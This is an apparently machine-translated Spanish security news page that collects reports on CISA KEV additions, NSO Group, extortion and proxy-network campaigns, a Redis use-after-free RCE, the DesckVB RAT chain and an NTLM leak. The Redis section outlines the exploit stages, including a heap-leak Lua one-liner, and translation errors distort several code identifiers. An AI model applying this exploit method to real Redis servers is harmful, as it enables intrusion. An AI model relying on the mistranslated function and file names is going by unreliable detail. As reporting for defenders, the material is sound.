CISA agrega fallas de Cisco, Chrome y Arista al catálogo KEV en medio de una explotación activa – CYBERDEFENSA.MX

La Agencia de Seguridad de Infraestructura y Ciberseguridad de EE. UU. (CISA) el martes agregado tres nuevas vulnerabilidades en sus vulnerabilidades explotadas conocidas (KEV) catálogo, tras informes de explotación activa.

La lista de vulnerabilidades es la siguiente:

  • CVE-2026-20245 (Puntuación CVSS: 7,8): una codificación inadecuada o una vulnerabilidad de escape de salida en Cisco Catalyst SD-WAN Manager que podría permitir a un atacante local autenticado ejecutar comandos arbitrarios como root suministrando un archivo manipulado al sistema afectado.
  • CVE-2026-11645 (Puntuación CVSS: 8,8): una vulnerabilidad de lectura y escritura fuera de límites en Google Chrome V8 que podría permitir a un atacante remoto ejecutar código arbitrario dentro de un entorno limitado a través de una página HTML diseñada.
  • CVE-2026-7473 (Puntuación CVSS: 6,9): una comparación incompleta con la vulnerabilidad de factores faltantes en el sistema operativo extensible (EOS) Arista que podría explotarse para procesar el tráfico de túnel no configurado.

No se planea ningún parche para la falla explotada de Arista EOS

«En las plataformas afectadas que ejecutan Arista EOS donde hay una configuración de decapsulación de túnel, como VXLAN (LAN extensible virtual), grupos decap o una interfaz de túnel GRE (encapsulación de enrutamiento genérico), el conmutador decapsulará y reenviará incorrectamente otros paquetes tunelizados inesperados con una IP de destino que coincida con su IP de decapsulación configurada», dijo Arista.

«Esto ocurre porque el conmutador no verifica el tipo de protocolo del túnel, lo que podría provocar un procesamiento inesperado del tráfico del túnel no configurado».

Ciberseguridad

El defecto de seguridad afecta principalmente a los productos de las series 7020R, 7280R/R2 y 7500R/R2. Sin embargo, para que se produzca una explotación exitosa, el dispositivo debe configurarse como un punto final de túnel con una IP de decapsulación, como un VXLAN VTEP, un punto final de túnel GRE o con un grupo de decapsulación de IP.

La compañía de equipos de red reconoció que la vulnerabilidad ha sido «informada como explotada en la naturaleza», y le dio crédito a Scott Christiansen, Lukas Peitz, Rich Compton y Jonathan Davis de Comcast por revelarla responsablemente.

A pesar de esto, Arista dijo que no se planean parches para abordar CVE-2026-7473, citando riesgos de que hacerlo podría romper las configuraciones existentes en las implementaciones. La compañía ha descrito mitigaciones para abordar el problema.

«Hay dos enfoques amplios para mitigar este problema: (1) aplicar ACL en dispositivos ascendentes o (2) aplicar ACL en los dispositivos donde se produce la decapsulación inesperada», dijo Arista. «En ambos casos, la idea es permitir selectivamente sólo el tráfico de túnel legítimo o bloquear selectivamente el tráfico de túnel malicioso».

Se ordenó a las agencias del Poder Ejecutivo Civil Federal (FCEB) que apliquen las correcciones o mitigaciones necesarias antes del 23 de junio de 2026 para contrarrestar la amenaza planteada por las tres vulnerabilidades.

La directiva CISA ordena a las agencias priorizar el parche de vulnerabilidad de una nueva manera

La Agencia de Seguridad de Infraestructura y Ciberseguridad ordenó el miércoles a las agencias federales que prioricen las vulnerabilidades basándose en cuatro criterios, como parte de la iniciativa para “parchear de manera más inteligente, no más difícil”.

Las agencias federales deberían enfatizar los parches para las vulnerabilidades que afectan un activo expuesto públicamente, permitir que un atacante automatice completamente la explotación, darles a los atacantes la capacidad de tomar el control de un sistema o relacionarse con evidencia de explotación activa en el mundo real, declaró CISA.

El director interino de CISA, Nick Andersen, anticipó el martes la directiva operativa vinculante (BOD), enmarcándola como un replanteamiento de la gestión de vulnerabilidades de manera más amplia.

«Esta Directiva proporciona definiciones, cronogramas y criterios claros que mejoran la transparencia, la previsibilidad y la planificación de recursos de las agencias para ejecutar una remediación de vulnerabilidades más efectiva», dijo Andersen en un comunicado. «CISA lidera y colabora con agencias civiles federales para adelantarse a nuestros adversarios a medida que cambian las tácticas, las tecnologías y las vulnerabilidades».

DBO 26-04 establece cronogramas sobre la rapidez con la que las agencias deben solucionar una vulnerabilidad en función de cuántos de los cuatro criterios cumple. Si cumple con los cuatro, por ejemplo, las agencias deben arreglarlo en un plazo de tres días y realizar una evaluación. “triaje forense” para evaluar si sus sistemas estaban comprometidos.

En términos más generales, las agencias deben actualizar inmediatamente sus políticas de gestión de vulnerabilidades, incluido el establecimiento de un proceso para la corrección continua de vulnerabilidades conocidas y explotadas (KEV) en la lista de «parches obligatorios» de CISA. Dentro de los 60 días, las agencias deben actualizar sus procesos para remediar las vulnerabilidades comunes, y dentro de los 180 días, las agencias deben cumplir con los cronogramas de remediación de la orden.

La directiva está motivada en parte por cómo la inteligencia artificial está cambiando la ventana del descubrimiento de vulnerabilidades a la militarización, y CISA dijo que refleja las prioridades de una orden ejecutiva sobre IA que el presidente Donald Trump firmó la semana pasada.

Los BOD no son obligatorios para nadie fuera de las agencias federales, pero CISA alienta al sector privado a adoptarlos. Los funcionarios de CISA dijeron en un publicación de blog sobre la necesidad de “parchear de manera más inteligente, no más difícil” que “los defensores ya están luchando por mantenerse al día”.

«La inteligencia artificial está ayudando tanto a los investigadores como a los adversarios a identificar fallas en el software, aumentando enormemente el ritmo al que se descubren nuevas vulnerabilidades», escribieron Chris Butera, subdirector ejecutivo interino de ciberseguridad, y Jonathan Spring, asesor técnico senior. «Según el Informe de investigaciones de violaciones de datos de 2026 de Verizon, solo el 26% de las vulnerabilidades en el catálogo de vulnerabilidades explotadas conocidas (KEV) de CISA fueron remediadas completamente por las organizaciones en 2025, una caída con respecto al 38% del año anterior. El tiempo medio para la resolución completa aumentó a 43 días».

Tim Starks

Escrito por Tim Starks

Tim Starks es reportero senior de CyberScoop. Sus paradas anteriores incluyen trabajar en The Washington Post, POLITICO y Congressional Quarterly. Originario de Evansville, Indiana, se ocupa de la ciberseguridad desde 2003. Envíe un correo electrónico a Tim aquí: tim.starks@cyberscoop.com.

Meta acusa a NSO Group de desafiar la orden judicial sobre software espía y presenta una denuncia judicial por desacato

Meta dijo el lunes que detectó una campaña de phishing vinculada al fabricante de software espía NSO Group a pesar de una orden judicial, lo que llevó al gigante tecnológico a presentar una denuncia por desacato al tribunal.

La compañía ganó un caso civil el año pasado contra NSO Group que le prohibía dirigirse a los usuarios de WhatsApp y obtuvo 168 millones de dólares en daños y perjuicios, aunque NSO Group ha estado apelando el fallo.

Pero Meta dice que NSO Group, creadores del software espía Pegasus, no está cumpliendo con la orden judicial permanente.

«Hemos interrumpido con éxito los intentos de ingeniería social vinculados a NSO, después de investigar los informes de los usuarios», dijo en una publicación de blog. «Intentaron engañar a las personas para que hicieran clic en enlaces maliciosos para dirigirlos a sitios web externos fuera de WhatsApp, similar a las campañas de phishing de 1 clic previamente informadas vinculadas a NSO. También los sorprendimos creando cuentas y grupos de prueba en WhatsApp, que eliminamos».

Meta dijo que la campaña se parecía a infecciones de software espía que Golpeó a periodistas y activistas en Jordania. de 2019 a 2023.

NSO Group no respondió a las solicitudes de comentarios sobre las acusaciones de Meta.

Un importante investigador que rastrea el software espía dijo que las acciones de NSO Group son un argumento para mantenerlos en la lista de “entidades” de sanciones de Estados Unidos de la que la compañía ha luchado por ser eliminada desde su designación en 2021.

«Las propias acciones de NSO constituyen el argumento más fuerte de por qué deberían permanecer en la lista de entidades», dijo John Scott-Railton, investigador principal del Citizen Lab de la Universidad de Toronto, escribió en las redes sociales. “Y reafirmar que la decisión de ponerlos allí fue la correcta”.

Meta hizo el mismo argumento.

«Cuando una empresa maliciosa incluida en la Lista de Entidades del gobierno de EE. UU. continúa desafiando a los tribunales estadounidenses, las restricciones existentes deben permanecer firmemente vigentes», dijo en su blog. “Aliviarlas socavaría la seguridad nacional de Estados Unidos y pondría en riesgo a las empresas estadounidenses y a miles de millones de personas en todo el mundo que dependen de comunicaciones seguras”.

Los legisladores han buscado información sobre el posible uso por parte del gobierno federal de la tecnología de NSO Group y otros tipos de software espía, a pesar de una lista negra, dados los estrechos vínculos entre el nuevo presidente ejecutivo de la compañía y el presidente Donald Trump.

Tim Starks

Escrito por Tim Starks

Tim Starks es reportero senior de CyberScoop. Sus paradas anteriores incluyen trabajar en The Washington Post, POLITICO y Congressional Quarterly. Originario de Evansville, Indiana, se ocupa de la ciberseguridad desde 2003. Envíe un correo electrónico a Tim aquí: tim.starks@cyberscoop.com.

UNC3753 utilizó vishing e intrusiones físicas en una campaña de extorsión por robo de datos en EE. UU. – CYBERDEFENSA.MX

Investigadores de ciberseguridad han revelado detalles de una campaña de extorsión por robo de datos con fines financieros que se ha dirigido a docenas de organizaciones de servicios profesionales, legales y financieros en los EE. UU. entre enero y mayo de 2026.

Google Mandiant y Google Threat Intelligence Group (GTIG) han atribuido la actividad a un actor de amenazas denominado UNC3753que también se conoce como Chatty Spider, Luna Moth y Silent Ransom Group (SRG).

«UNC3753 aprovecha las técnicas de engaño de phishing por voz (vishing) y de ingeniería social para lograr acceso remoto a entornos corporativos», investigadores Chad Reams, Tufail Ahmed, Keith Knapp, Ashley Frazer y Tyler McLellan dicho.

«Usando pretextos como la migración de datos o correos electrónicos relacionados con facturas, los actores de amenazas inician conversaciones telefónicas haciéndose pasar por soporte de TI y convencen a los objetivos para que organicen sesiones de pantalla compartida y descarguen utilidades de administración y monitoreo remoto (RMM)».

Al obtener acceso, se ha descubierto que los actores de amenazas realizan búsquedas directas para localizar y exfiltrar archivos de interés o engañan a la víctima para que lleve a cabo acciones en su nombre. La información robada incluye acuerdos legales de propiedad, información de identificación personal (PII) y registros financieros.

Ciberseguridad

En algunos casos, los atacantes han accedido a los sistemas de las víctimas en persona, haciéndose eco de un aviso emitido por la Oficina Federal de Investigaciones (FBI) de Estados Unidos el mes pasado. Estas intrusiones físicas involucran a actores de amenazas que se hacen pasar por técnicos de TI para ingresar a las oficinas corporativas e intentar robar datos utilizando medios USB extraíbles.

«Al enviar a alguien en persona a la ubicación de la víctima para facilitar la intrusión, los actores SRG extraen datos a un disco duro externo o unidad USB insertada por el actor de la amenaza en la computadora de la víctima», dijo el FBI sobre la nueva escalada en las capacidades de UNC3753.

Google dijo que UNC3753 comparte superposiciones tácticas con UNC2686, un grupo de amenazas conocido anteriormente por llevar a cabo Campañas estilo BazarCall en 2021. Aunque se ha observado que el grupo implementa el ransomware LockBit Black en el pasado, se ha centrado principalmente en operaciones de extorsión desde 2022, presionando a las víctimas para que paguen o se arriesguen a que sus datos se publiquen en el sitio de filtración de datos LEAKEDDATA.

Se considera que tanto UNC3753 como UNC2686 son ramificaciones de la ahora desaparecida pandilla de ransomware Conti, y las primeras iteraciones de las campañas utilizan señuelos de cancelación de suscripción como parte de ataques de phishing de devolución de llamadas que tienen como objetivo instalar software de acceso remoto en las máquinas de las víctimas.

A partir de marzo de 2025, el equipo de hackers se ha hecho pasar por personal interno de la mesa de ayuda de TI corporativa para engañar a las víctimas para que se unan a una sesión de pantalla compartida en plataformas de comunicación empresarial como Zoom, Microsoft Teams o Quick Assist, evitando efectivamente los controles de seguridad tradicionales.

«El grupo de amenazas frecuentemente inicia campañas utilizando señuelos de correo electrónico benignos con temas de facturas enviados desde cuentas de correo electrónico de consumidores controladas por actores», dijo Google. «Estos mensajes no contienen enlaces activos ni archivos adjuntos maliciosos. En cambio, normalmente contienen un mensaje breve y genérico. El objetivo principal de estos correos electrónicos es establecer un pretexto, lo que genera preocupaciones de seguridad interna del objetivo para que sea más susceptible a llamadas de voz de seguimiento».

Una vez que se establece una sesión, los atacantes intentan establecer un punto de apoyo persistente guiando a las víctimas para que instalen software de escritorio remoto legítimo como AnyDesk, Bomgar, SuperOps RMM o Zoho Assist. Las instrucciones para instalar estos programas se comparten a través de un servicio legítimo llamado «nota privada[.]com,» que permite a los usuarios enviar notas que se autodestruyen después de ser leídas por el destinatario.

También se ha observado que UNC3753 establece sesiones de Zoom directamente en las computadoras portátiles personales de los objetivos para acceder a la infraestructura de escritorio virtual (VDI) corporativa y profundizar en los sistemas de archivos corporativos con el objetivo de enumerar directorios locales y en la nube, rastrear unidades de red mapeadas y recopilar datos de carpetas altamente confidenciales, incluidas aquellas relacionadas con declaraciones de impuestos, auditorías, acuerdos con clientes corporativos y números de Seguro Social (SSN).

Ciberseguridad

En la etapa final, los datos capturados se envían a los actores de la amenaza a través de WinSCP o Rclone, o a direcciones de correo electrónico controladas por el actor de la amenaza desde el buzón de correo del objetivo. A continuación, los atacantes envían una demanda de extorsión en forma de mensaje de correo electrónico, normalmente dentro de los 30 minutos posteriores a la salida del entorno de destino.

Los mensajes de correo electrónico dan a las víctimas un plazo de tres días para iniciar negociaciones de rescate. También amenazan con llamar y enviar correos electrónicos directamente a los empleados y clientes externos para notificarles sobre la violación de datos si no responden, sin mencionar publicar toda la información robada en el sitio de fuga de datos.

«Las firmas de servicios legales representan objetivos de alto valor para los actores de extorsión. Mantienen depósitos concentrados de archivos de transacciones de clientes, planes de fusiones y adquisiciones, secretos comerciales de clientes e informes regulatorios corporativos extremadamente sensibles», dijo Google.

«Los grupos de amenazas reconocen que las entidades legales están sujetas a una fuerte exposición regulatoria y de reputación y pueden estar muy motivadas para resolver situaciones de extorsión silenciosamente para proteger su posición profesional. Los actores de amenazas reconocen que apuntar al elemento humano -específicamente usando ingeniería social guiada por voz- les permite eludir fácilmente perímetros técnicos robustos, puertas de enlace de seguridad web y configuraciones de MFA».

PCPJack secuestra 230 servidores AWS, Google Cloud y Azure para una red de retransmisión SMTP encubierta – CYBERDEFENSA.MX

El actor de amenazas conocido como PCPJack ha secuestrado servidores en la nube asociados con Amazon Web Services (AWS), Google Cloud y Microsoft Azure para crear una red encubierta de retransmisión de correo electrónico SMTP.

«Los servidores empresariales comprometidos en EE. UU., Europa y Asia se convirtieron silenciosamente en servidores proxy SMTP, se verificó su capacidad de retransmisión de correo y se sincronizaron con un consumidor intermedio cada cinco minutos», dijo Hunt.io en un comunicado. «La infraestructura todavía estaba funcionando cuando la encontramos».

La empresa de inteligencia de amenazas dicho encontró código fuente, archivos binarios compilados, registros de estado de implementación, escáneres de Internet, herramientas de explotación y una configuración de Sliver en vivo después de que el actor de amenazas detrás de la operación dejó dos directorios abiertos en un servidor de comando y control (C2) («213.136.80[.]73») sin ninguna autenticación.

PCPJack fue descubierto por primera vez por SentinelOne en abril de 2026 después de que identificó un marco de robo de credenciales que apunta específicamente a los servicios en la nube, mientras tomaba medidas para terminar y eliminar procesos o artefactos asociados con TeamPCP, otro notorio grupo de piratería que ha llamado la atención en los últimos meses por sus ataques a la cadena de suministro de software.

Ciberseguridad

Organizado en uno de los directorios abiertos. Astilla-Kit de herramientas de implementación de proxy SMTP integrado, junto con tunelización Chisel y binarios de proxy para la mayoría de las arquitecturas de CPU de Linux, como AMD64, ARM64 y x86. En el lado de la víctima, el binario se elimina como un archivo oculto con prefijo de punto y se conserva en «/var/tmp/.xs».

También se encuentran en los directorios scripts de implementación diseñados para cargar la configuración del cliente Sliver C2 y filtrar las balizas de Linux que se han registrado en los últimos diez minutos. Las balizas son implantes que llaman periódicamente al servidor C2 a intervalos regulares para registrarse y recuperar comandos.

«Cada baliza recibe un puerto proxy SOCKS5 derivado de manera determinista de un hash MD5 de su UUID Sliver, asignado en el rango 10000-14999», señaló Hunt.io. «La misma baliza siempre se asigna al mismo puerto en todas las ejecuciones, lo que elimina la necesidad de un registro de puerto compartido».

El script también es capaz de ejecutar una puerta de calidad SMTP que busca acceso saliente a smtp.gmail.[.]Com:587. Los hosts que no pasan esta verificación se omiten con un código de salida de cero.

«Esta puerta define el propósito de la operación: los hosts que no pueden transmitir correo electrónico no tienen ningún valor para este canal», añadió la empresa de ciberseguridad. «Las balizas se procesan en lotes de 50, con una espera de 25 minutos después de la carga y 15 minutos después de la ejecución de los comandos, para dar cabida a registros de balizas a intervalos lentos».

Se ha descubierto que las iteraciones posteriores de los scripts de implementación eliminan la puerta SMTP y la lógica de procesamiento por lotes. También está presente un script de diagnóstico que selecciona cinco balizas activas y les asigna a cada una un comando de shell que verifica lo siguiente:

  • Presencia de archivos binarios de Chisel en rutas de caída conocidas
  • Se está ejecutando un proceso de Chisel
  • Espacio en disco
  • Accesibilidad del puerto 9000 en el C2, y
  • Presencia de artefactos de persistencia, como la entrada cron o el servicio systemd
Ciberseguridad

Además, el servidor C2 ejecuta un script Python llamado «chisel_verifier.py» como un demonio en segundo plano persistente, que enumera los puertos activos del túnel Chisel a través de ss -tlnp cada 60 segundos, prueba la capacidad SMTP de cada nuevo puerto y elimina los túneles fallidos o descartados del grupo activo.

Los proxies verificados se enriquecen con la dirección IP de salida, el país y el ASN a través de servicios como api.ipify.[.]org y ip-api[.]com. Luego, las listas de proxy se sincronizan cada cinco minutos a través del Protocolo de copia segura (SCP) con un servidor descendente independiente en 38.242.204.[.]245. Actualmente no se puede acceder al servidor. El objetivo final de la operación aún no está claro en este momento.

«El resultado de 230 nodos es el resultado observable. Si esta progresión refleja un solo operador iterando o múltiples actores que comparten la misma infraestructura no se puede determinar a partir de los archivos recuperados», dijo Hunt.io, describiéndola como una campaña oportunista.

«La lista de proxy verificada se sincroniza cada cinco minutos con ese servidor y alguien la está consumiendo. Ya sea para spam, phishing o cualquier otra cosa, la infraestructura para realizar entregas a escala claramente estaba funcionando».

La IA agente está transformando la defensa, pero sólo una infraestructura de TI segura la maximizará – CYBERDEFENSA.MX

Durante las últimas semanas, se ha recordado a la comunidad de la ciberseguridad lo rápido que la IA fronteriza y agente en las redes de defensa puede desafiar nuestras suposiciones. Cuando el modelo Claude Mythos de Anthropic estuvo disponible para un conjunto limitado de organizaciones como vista previa técnica, se informó que un grupo no autorizado afirmó que había obtenido acceso en cuestión de horas. El incidente, de ser cierto, fue más que una posible infracción. Fue una advertencia.

El impacto potencial de la IA avanzada en las redes de inteligencia y defensa de Estados Unidos es significativo. A medida que el gobierno de EE. UU. avanza para implementar capacidades de IA en redes clasificadas, la oportunidad es clara: La IA avanzada puede ayudar a acelerar la superioridad de decisión de las fuerzas estadounidenses. Pero los riesgos se están expandiendo con la misma rapidez, particularmente a medida que la IA agente comienza a operar en redes sensibles, entornos de datos y flujos de trabajo de misiones.

La adopción de la IA no se trata simplemente de implementar modelos potentes. Requiere seguridad, gobernanza e infraestructura resiliente adecuadas a su alrededor.

La IA es tan confiable como los datos que utiliza, las redes que toca y los controles que determinan quién y qué puede acceder a ella. En entornos clasificados, ese desafío se ve agravado por la necesidad de mover información de forma segura a través de niveles de clasificación, compartimentos, límites de coalición y entornos operativos.

Para que la IA proporcione rápidamente la ventaja de decisión esperada, se deben considerar tres áreas importantes:

1. ¿Qué entra en el modelo?

Los datos de capacitación y los modelos comerciales deben moverse de manera rápida pero segura a entornos clasificados. Sin una inspección adecuada, incluso el modelo de IA más potente puede convertirse en un problema al procesar información obsoleta o ingerir contenido «envenenado» que conduzca a evaluaciones comprometidas.

2. ¿Quién y qué puede acceder a la IA?

Los analistas autorizados, los socios de la coalición, los operadores de borde y los equipos de integración de IA necesitarán un acceso gobernado que imponga límites de seguridad sin «colapsar» inadvertidamente las redes.

3. ¿A dónde se dirige el agente de IA?

Cada llamada de modelo a una base de datos, sistema de misión o socio de coalición debe preservar la integridad de la capa de clasificación. Si la IA va a comprimir los cronogramas operativos, el límite de seguridad no puede convertirse en el primer punto de falla.

La ventaja de la misión de IA comienza con una infraestructura segura

Todo esto depende de las capas de red debajo de los modelos. Everfox está permitiendo a las agencias de defensa e inteligencia seguir el ritmo de los cambios revolucionarios en la IA sin comprometer la velocidad y la seguridad de la misión. Nuestras tecnologías proporcionan un tejido de red seguro basado en dominio cruzado capacidades y reforzado por hardware protección diseñada específicamente para entornos clasificados y ventaja táctica, todo para que la IA pueda implementarse de forma segura y confiable a escala de misión.

La IA introduce riesgos en todas las capas: componentes del sistema, integraciones, resultados posteriores y flujos de trabajo de la misión. A medida que las organizaciones de defensa e inteligencia aceleren la adopción, las herramientas de IA operarán cada vez más en dominios, compartimentos y teatros de operaciones. En estos entornos, una infraestructura confiable, controles de acceso estrictos y una gobernanza de datos sólida no son opcionales. Son de misión crítica.

Los datos confidenciales deben poder moverse de forma segura a través de los límites de clasificación, con amenazas y violaciones de políticas identificadas antes de que lleguen a un modelo.

Si queremos implementar IA de manera responsable a escala, tenemos que incorporar la seguridad desde el principio, no agregarla después de que la tecnología ya esté integrada en las operaciones de la misión.

Frontier AI será un motor importante para la ventaja de futuras misiones. Pero sin una estructura de red segura que lo soporte, no se puede confiar en que ni siquiera los mejores modelos funcionen donde y cuando más importan.

Nota: Este artículo fue escrito y contribuido por Dave Wajsgras, presidente y director ejecutivo de Everfox.

¿Encontró interesante este artículo? Este artículo es una contribución de uno de nuestros valiosos socios. Síguenos en noticias de google, Gorjeo y LinkedIn para leer más contenido exclusivo que publicamos.

Una herramienta de IA autónoma encuentra un defecto RCE de hace 2 años en Redis (CVE-2026-23479) – CYBERDEFENSA.MX

Redis tiene parcheado un uso después de la liberación en su código de cliente de bloqueo que permite a un usuario autenticado ejecutar comandos arbitrarios del sistema operativo en la máquina que aloja la base de datos. La falla fue encontrada por una herramienta de inteligencia artificial autónoma diseñada para detectar errores en grandes bases de código.

Seguimiento como CVE-2026-23479la falla se introdujo en Redis 7.2.0 y permaneció en todas las ramas estables hasta las correcciones del 5 de mayo, sin que nadie se diera cuenta durante más de dos años. NVD lo califica con 8,8 según CVSS 3,1; Redis lo enumera como 7.7 en CVSS 4.0. Fue informado por Team Xint Code, y una completa técnica escribir ahora es público.

La huella de la nube empeora esto. El análisis de Wiz, publicado con el informe del exploit, coloca a Redis en una gran mayoría de entornos de nube, y la mayoría de esas instancias se ejecutan sin contraseña. El exploit necesita una sesión autenticada, pero en una implementación predeterminada, el usuario predeterminado ya posee todos los privilegios que requiere la cadena.

El defecto vive en desbloquearClientOnKey() en src/bloqueado.cque se activa cuando un evento clave activa un comando bloqueado. La función envía el comando en cola a través de procesoCommandAndResetClient()luego sigue usando el mismo puntero de cliente. El problema: esa función puede liberar al cliente como efecto secundario, y su propio comentario en el encabezado lo dice. La persona que llama ignora el valor de retorno y lee la estructura liberada de todos modos, un uso después de la liberación (CWE-416).

Según el análisis de Wiz, el error requirió dos confirmaciones para crearse. Una refactorización de enero de 2023 (PR #11012) agregó la llamada no marcada. Un cambio de marzo de 2023 (PR #11568) agregó más acceso de cliente después. Ninguno de los dos era peligroso por sí solo. Juntos, alcanzaron la disponibilidad general en 7.2.0 y sobrevivieron a múltiples rondas de revisión de seguridad.

Ciberseguridad

La cadena comienza filtrando una dirección de montón. A partir de ahí, libera a un cliente e introduce uno falso en la misma memoria, luego convierte la propia memoria de Redis en contra de sí misma para sobrescribir un puntero de función.

La versión publicada se ejecuta en tres etapas.

  • Primero, un script Lua de una línea (EVAL «return tostring(redis.call)» 0) pierde un puntero de montón.
  • En segundo lugar, el atacante prepara los límites de memoria del cliente, estaciona un cliente inflado en una secuencia, luego elimina los límites y lo activa. Redis libera al cliente bloqueado en mitad de la llamada y un SET canalizado recupera inmediatamente el espacio liberado con una estructura de cliente falsa.
  • En tercer lugar, la contabilidad de memoria de rutina de Redis en updateClientMemoryUsage() realiza una disminución fuera de los límites utilizando campos controlados por el atacante, dirigidos a la tabla de compensación global para redireccionar strcasecmp() a system(). El siguiente comando que Redis analiza se ejecuta como un comando de shell.

La imagen oficial de Redis Docker facilita el último paso. Se envía solo con RELRO parcial, lo que permite que GOT se pueda escribir en tiempo de ejecución. ASLR y PIE no ayudan aquí, ya que la escritura es relativa a un global cuyo desplazamiento se fija en el momento de la compilación.

La cadena completa necesita una sesión autenticada con CONFIG SET, EVAL, comandos de transmisión (XREAD/XADD) y SET/GET básico, que se asigna a las categorías ACL @admin, @scripting, @stream y @read/@write.

El usuario predeterminado los tiene todos y, en la mayoría de las implementaciones, estos privilegios se agrupan en una única aplicación compartida o función de operador. Negar CONFIG por completo rompe esta cadena específica, aunque no el uso después de la liberación subyacente.

El equipo Xint Code demostró el funcionamiento del RCE en ZeroDay.Nube 2025la competencia de piratería de Wiz en Londres el pasado diciembre. teoría describe Código Xint como una herramienta de seguridad de IA autónoma creada para detectar errores en grandes bases de código.

Redis dijo que no tenía evidencia de explotación en su propio entorno o en el de sus clientes, y hasta el momento de esta publicación no ha aparecido ningún informe público al respecto. La cadena técnica completa ahora es pública, lo que aumenta el riesgo de explotación posterior.

Ciberseguridad

Actualice al parche menor para su serie: 7.2.14, 7.4.9, 8.2.6, 8.4.3 u 8.6.3, todos lanzados el 5 de mayo. Las actualizaciones menores dentro de una serie deben ser inmediatas. Los servicios administrados de Redis se actualizan según sus propios cronogramas y Redis dice que Redis Cloud ya está listo.

Rama Afectado Fijado
7.2.x 7.2.0 a 7.2.13 7.2.14
7.4.x 7.4.0 a 7.4.8 7.4.9
8.2.x 8.2.0 a 8.2.5 8.2.6
8.4.x 8.4.0 a 8.4.2 8.4.3
8.6.x 8.6.0 a 8.6.2 8.6.3

Si aún no puede parchear: mantenga Redis fuera de la Internet pública y detrás de TLS, ajuste las ACL para que ningún rol mantenga juntos a @admin, CONFIG y @scripting, y deniegue @scripting si no usa Lua, lo que elimina la fuga de la Etapa 1.

Priorice las instancias expuestas a Internet, las credenciales de aplicaciones compartidas y cualquier función que combine CONFIG, secuencias de comandos y acceso a transmisiones. Mientras lo hace, rote las credenciales de Redis ampliamente compartidas.

CVE-2026-23479 fue uno de cinco fallas de Redis de clase RCE revelado el mes pasado, y sigue a la falla RediShell 2025 de Redis, otro uso después de la liberación autenticado que involucra secuencias de comandos Lua. También es el que detectó una herramienta de inteligencia artificial. Dos confirmaciones lo colocaron, dos años lo ocultaron y permaneció en una de las bases de datos más implementadas hasta que un concurso de piratería lo sacó a la luz. La revisión del código nunca lo hizo.

Se abusa de Google DoubleClick en una nueva campaña de malspam para ofrecer DesckVB RAT – CYBERDEFENSA.MX

Los investigadores de ciberseguridad han detectado una nueva campaña de malspam que utiliza el dominio DoubleClick de Google como una forma de evadir la detección y, en última instancia, entregar un troyano de acceso remoto (RAT) llamado DesckVB RAT.

«Antes de que la víctima llegue a la infraestructura controlada por el atacante, el señuelo pasa por DoubleClick, un dominio legítimo propiedad de Google que es menos probable que muchas herramientas de seguridad traten como sospechoso», afirman los investigadores de Huntress, Anna Pham y Adam Mooney. dicho en un informe compartido con The Hacker News.

«A partir de ahí, la víctima pasa a un kit de malspam que se personaliza sobre la marcha utilizando la dirección de correo electrónico de la víctima, incorporando dinámicamente la marca de la empresa y los detalles de la ubicación para que la página parezca convincente sin necesidad de que los operadores creen un señuelo para cada objetivo».

Lo que hace que este ataque sea digno de mención es que elimina la necesidad de tener un kit personalizado para cada organización objetivo, lo que hace que estas operaciones sean más escalables y rentables. El objetivo final de la campaña es eliminar DesckVB RAT, un troyano basado en .NET que ha estado activo desde febrero de 2026.

Ciberseguridad

El ataque comienza cuando un usuario desprevenido abre un archivo HTML adjunto a un correo electrónico de phishing. El archivo activa una redirección de meta-actualización del navegador a una URL de seguimiento de clics de Google DoubleClick Campaign Manager, desde donde se dirige al usuario a otro redirector, que decodifica la dirección de correo electrónico codificada en Base64 y lleva a la víctima a una página de destino que contiene un botón «Descargar PDF».

Al hacer clic en el botón, el servidor responde con un archivo ZIP que inicia el resto de la cadena de infección. Esto se logra mediante un cargador de JavaScript, cuya principal responsabilidad es recuperar y ejecutar un .NET RAT mientras pasa desapercibido. El script extrae y ejecuta un script de PowerShell, que luego recupera un cargador .NET de un servidor externo.

El cargador actúa como un dispositivo que verifica que no está siendo analizado, neutraliza los controles de seguridad de la máquina, configura la persistencia y, finalmente, descarga y ejecuta la carga útil RAT mediante el uso de una técnica llamada proceso hueco que implica inyectar el malware en procesos firmados por Microsoft.

Una vez iniciado, el troyano se comunica con un servidor de comando y control (C2) a través de sockets TCP sin formato, realiza reconocimiento del sistema y configura exclusiones de Microsoft Defender. El troyano también parchea la interfaz de escaneo antimalware (AARMI) y seguimiento de eventos para Windows (ETW) en el nivel API nativo desde el principio en un esfuerzo por cegar la telemetría de Windows antes de que se establezca la persistencia en el host configurando las entradas del Registro Run y ​​RunOnce, además de colocar un cargador responsable de iniciar el RAT en la carpeta de Inicio del usuario.

Ciberseguridad

El malware viene con capacidades para extraer datos, ejecutar comandos y desplegar cargas útiles adicionales, otorgando a los atacantes control total sobre las máquinas infectadas, al mismo tiempo que toma medidas para pasar desapercibido al finalizar y reiniciar la máquina si detecta una herramienta de análisis o determina que se está ejecutando en un entorno aislado.

«Este es un fuerte recordatorio de por qué es importante la defensa en profundidad», dijo Huntress. «Configurar un objeto de política de grupo (GPO) en Active Directory para forzar la apertura predeterminada de archivos de script como .vbs, .hta y .js en el Bloc de notas puede detener a un actor de amenazas en la primera etapa, evitando que se eliminen cargas adicionales».

«En el frente de la seguridad del correo electrónico, las organizaciones deberían considerar implementar registros DMARC, DKIM y SPF para reducir la probabilidad de que correos electrónicos falsificados o maliciosos lleguen a los usuarios finales. Más allá de eso, una solución de puerta de enlace de correo electrónico capaz de proteger archivos adjuntos y enlaces antes de la entrega agrega otra capa significativa de protección».

Una vulnerabilidad de URI de búsqueda de Windows sin parches permite a los atacantes robar hashes NTLMv2 – CYBERDEFENSA.MX

Investigadores de ciberseguridad han revelado detalles de un problema sin parchear que podría explotarse para revelar el hash NTLMv2 de un usuario al atacante.

Como en el caso de CVE-2026-33829que afectó al controlador ms-screensketch: URI de la herramienta de recorte de Windows, el problema recién señalado reside en la búsqueda: controlador URI, según Cazadora.

CVE-2026-33829 hace referencia a una vulnerabilidad de suplantación de identidad que podría exponer información confidencial a un actor no autorizado. Microsoft lo parchó en abril de 2026.

«Un atacante podría inducir al usuario a hacer clic en un enlace especialmente diseñado en un navegador web u otra fuente URL, incrustándolo en una página web o mensaje de correo electrónico», señaló Microsoft en su aviso en ese momento.

«Si el usuario aprueba el lanzamiento del enlace, la URL diseñada puede inducir a la computadora a conectarse a un servidor SMB elegido por el atacante, lo que revelaría el hash NTLMv2 del usuario al atacante, quien podría usarlo para autenticarse como usuario».

Ciberseguridad

